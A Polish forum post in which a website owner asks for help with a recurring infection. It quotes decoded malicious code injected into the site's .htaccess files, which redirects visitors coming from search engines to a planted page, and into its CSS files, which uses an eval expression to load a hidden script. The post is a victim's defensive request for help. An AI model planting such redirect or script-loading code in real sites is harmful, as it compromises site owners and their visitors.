Prowadzę stronę www.swos.pl
Ostatnio walczę z wirusem malware-gen, o którym informuje AVAST i to nie jest problem który wyjasnianiają w tym wątku http://prvforum.prv.pl/viewtopic.php?t=15553
tutaj jest fota z antywirusa
Oczywiscie mój anti nie wykrywa go, jednakze to nie znaczy ze go nie ma.
Wirus jest specyficzny bo bez naruszenia daty dodaje kod:
do plików .htaccess, do wszystkich jakie znajduje na I i II poziomie roota
CODE
# a0b4df006e02184c60dbf503e71c87ad
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail
gogo|poisk|alltheweb|f ireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_wo
d|buscar|text|words|su|q t|rdata)\=
RewriteCond %{HTTP_REFERER} \=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <59
RewriteRule ^.*$ /swospl/gfx/arutab/ex3/t.htm [L]
# a995d2cc661fa72452472e9554b5520c
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail
gogo|poisk|alltheweb|f ireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_wo
d|buscar|text|words|su|q t|rdata)\=
RewriteCond %{HTTP_REFERER} \=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <59
RewriteRule ^.*$ /swospl/gfx/arutab/ex3/t.htm [L]
# a995d2cc661fa72452472e9554b5520c
oraz analogicznie tylko do plików arkusza stylów CSS kod
CODE
/*0b4df006e02184c60dbf503e71c87ad */
body {
margin-top: expression(eval(unescape('if (!document.getElementById('JSSS')){
JSS1 = 59; JSS2 = 157763;
JSS3 = '/swospl/gfx/arutab/dummy.htm';
var js = document.createElement('script');
js.setAttribute('src', '/swospl/gfx/arutab/check.js');
js.setAttribute('id', 'JSSS'); document.getElementsByTagName('head').item(0).appendChild(js) };
'))) }
/* a995d2cc661fa72452472e9554b5520c */
body {
margin-top: expression(eval(unescape('if (!document.getElementById('JSSS')){
JSS1 = 59; JSS2 = 157763;
JSS3 = '/swospl/gfx/arutab/dummy.htm';
var js = document.createElement('script');
js.setAttribute('src', '/swospl/gfx/arutab/check.js');
js.setAttribute('id', 'JSSS'); document.getElementsByTagName('head').item(0).appendChild(js) };
'))) }
/* a995d2cc661fa72452472e9554b5520c */
to powyższe jest z dekodowane, bo inaczej człowiek by nic nie odczytał.
Po nitce do kłębka znalazłem nie proszony katalog ARUTAB i usunąłem.
W tym roku poraz 3 pojawia się ten katalog i nie wiadomo dlaczego zmienia style css i .htaccess
strona ogólnie nie zmienia się nic, a nic wszystko działa jak należy, ale .... nie podoba mi się taki nie proszony gosć i skąd się wziął.
Dostęp do konta mają tylko 2 osoby. Po poprzedniej takim incydencie skasowałem pliki js i sprawdziłem wszystkie pliki
kasując w css i ht szkoliwy kod i skontrolowałem pliki js i php na całym serwerze.
Nic nie znalazłem.
Jednakże dzisiaj pojawił się ponowanie i znowu musiałem sprzątać.
Będę wdzięczny za rozwiązanie.
- prawdopodobne rozwiązanie jest w http://forums.devshed.com/apache-developme...y-512348-2.html
jednakże zupełnie nie rozumie dyskusji, w większości przekracza moje kompetencje językowe.